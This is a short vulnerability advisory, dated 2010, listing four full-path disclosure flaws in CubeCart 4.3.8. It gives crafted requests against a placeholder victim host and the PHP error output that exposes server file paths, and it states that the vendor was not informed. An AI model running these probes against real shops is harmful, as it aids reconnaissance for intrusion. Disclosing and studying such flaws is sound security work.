Application: CubeCart 4.3.8 Authors Site: http://www.cubecart.com/ +--------------------------------------------------------------------------------------------+ [1]------------------------------------------------------------------------------------------> Information Disclosure: [POST] http://www.victim.com/cubecart-4.3.8/index.php?_a=cart&catId=0 POST Params: add ' quan 1 Result: Warning: Invalid argument supplied for foreach() in /var/www/cubecart-4.3.8/includes/content/cart.inc.php on line 138 Warning: Cannot modify header information - headers already sent by (output started at /var/www/cubecart-4.3.8/includes/content/cart.inc.php:138) in /var/www/cubecart-4.3.8/includes/functions.inc.php on line 106 Warning: Cannot modify header information - headers already sent by (output started at /var/www/cubecart-4.3.8/includes/content/cart.inc.php:138) in /var/www/cubecart-4.3.8/includes/functions.inc.php on line 107 Warning: Cannot modify header information - headers already sent by (output started at /var/www/cubecart-4.3.8/includes/content/cart.inc.php:138) in /var/www/cubecart-4.3.8/includes/functions.inc.php on line 109 [2]------------------------------------------------------------------------------------------> Information Disclosure: http://www.victim.com/cubecart-4.3.8/language/en/admin/admin_common.inc.php Result: Warning: require(languageCC_DSCC_DSconfig.php) [function.require]: failed to open stream: No such file or directory in /var/www/cubecart-4.3.8/language/en/admin/admin_common.inc.php on line 2 Fatal error: require() [function.require]: Failed opening required 'languageCC_DSCC_DSconfig.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/cubecart-4.3.8/language/en/admin/admin_common.inc.php on line 2 Note: This is applicable for the various different languages. [3]------------------------------------------------------------------------------------------> Information Disclosure: http://www.victim.com/cubecart-4.3.8/language/en/common.inc & http://www.victim.com/cubecart-4.3.8/language/en/common.inc.php Warning: require(CC_ROOT_DIRCC_DSlanguageCC_DSLANG_FOLDERCC_DSconfig.php) [function.require]: failed to open stream: No such file or directory in /var/www/cubecart-4.3.8/language/en/common.inc.php on line 2 Fatal error: require() [function.require]: Failed opening required 'CC_ROOT_DIRCC_DSlanguageCC_DSLANG_FOLDERCC_DSconfig.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/cubecart-4.3.8/language/en/common.inc.php on line 2 Note: This is applicable for the various different languages. [4]------------------------------------------------------------------------------------------> http://www.victim.com/cubecart-4.3.8/language/en/includes/content/error.inc.php Warning: require(CC_ROOT_DIRCC_DSlanguageCC_DSLANG_FOLDERCC_DSconfig.php) [function.require]: failed to open stream: No such file or directory in /var/www/cubecart-4.3.8/language/en/includes/content/error.inc.php on line 2 Fatal error: require() [function.require]: Failed opening required 'CC_ROOT_DIRCC_DSlanguageCC_DSLANG_FOLDERCC_DSconfig.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/cubecart-4.3.8/language/en/includes/content/error.inc.php on line 2 Note: This is applicable for the various different languages. +-[Notes:]-----------------------------------------------------------------------------------+ Vulnerabilities found on: 28/02/2010 Author(s) Informed on: Not Informed Author(s) Response: NA Author(s) Fix: NA JohnC@NoBytes.com http://www.NoBytes.com